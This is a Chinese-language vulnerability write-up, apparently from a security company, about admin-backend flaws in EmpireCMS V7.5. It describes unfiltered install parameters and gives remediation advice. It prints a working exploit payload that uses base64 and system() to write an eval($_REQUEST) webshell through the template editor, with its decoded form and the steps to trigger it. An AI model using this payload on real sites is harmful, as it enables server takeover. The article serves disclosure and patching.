開源軟體帝國CMS後台漏洞滲透入侵與代碼修復權限說明與教學
,受影響的版本是EmpireCMS V7.5,從帝國官方網站下載到本地,我們人工對其代碼進行詳細
的漏洞檢測與安全代碼分析。共計發現三個高危漏洞,都是在網站的後臺管理頁面上的功能發現
的。該漏洞的產生,最根源的問題是沒有對get,post提交方式進行嚴格的安全效驗與過濾,導致
可以插入惡意程式碼到後端伺服器中去處理,導致漏洞的發生。
帝國CMS系統,簡單給大家介紹一下,目前很多站長,以及企業建站,都在使用該套系統,快速
,便捷,易於搜尋引擎收錄,採用的是B/S架構開發,php語言+Mysql資料庫,支援大併發同時訪
問,可以承載較多的用戶快速的訪問網站的各個頁面與內容,範本自訂化,可以設置標籤與自
行設計網站外觀,靜態html生成,還有採集功能,深受廣大站長和網站運營者的喜歡。
我們ESAFE安全技術在對該代碼進行安全檢測與滲透測試的手,會先大體看下代碼,熟悉整個網站
的架構,資料庫設定檔,以及入口調用到的檔,通常調用到的安全規則是如何寫的,多個方
面去大體的瞭解該代碼,目前滲透測試中,發現的網站漏洞有:SQL注入漏洞,網站敏感資訊泄
露,初始化安裝功能漏洞,直行平行越權邏輯漏洞,任意檔上傳漏洞,登錄繞過漏洞,短信驗
證碼漏洞,找回密碼漏洞,資料庫備份webshell,XSS跨站,CSRF漏洞等待。
首先我們檢測到的是帝國安裝代碼功能上存在可以插入惡意程式碼漏洞,在install安裝目錄下的ind
ex.php檔中,可以查到表的首碼,也就是獲取前端提交過來的參數,然後繼續往下看,data目
錄下的fun.php代碼裡的參數並沒有做任何的安全效驗,導致可以直接插入惡意程式碼寫入到配置文
件config.php中去。漏洞詳情如下圖:
後臺還存在get webshell漏洞,打開後臺管理功能頁面,選擇管理首頁範本,緊接著右鍵點擊增加
首頁方案中,複製漏洞exp代碼:<?php $aa = base64_decode(ZWNobyAnPD9waHAgZXZhbCgk
X1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA)${(system)($aa)};?> 解密base64後是:
ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA=>
echo '<?php eval($_REQUEST[hp]);'>shell.php
寫到範本內容頁面裡,左鍵點擊提交,再點擊啟用此方案,就在會e/admin/template/資料夾下
生成一個shell.php文件。
關於帝國CMS漏洞的修復辦法,對所有的get,post請求做安全過濾,也可以直接在eaddslashes2
的參數裡增加惡意程式碼的攔截機制,先檢測後放行,該漏洞的利用條件是需要有後臺管理員許可權
,利用的不是太多,建議對網站後臺的管理目錄進行更改,或者直接將管理員的密碼設置的複雜
一些。如果您對網站漏洞修復不是太懂的話,也可以找專業的網站安全公司來處理,國內ESAFE
安全,啟明星辰,綠盟,都是比較不錯的,網站漏洞經常出現,也請網站的運營者多多關注Empi
reCMS的官方,一有補丁就立即修復掉,將安全損失降到最低。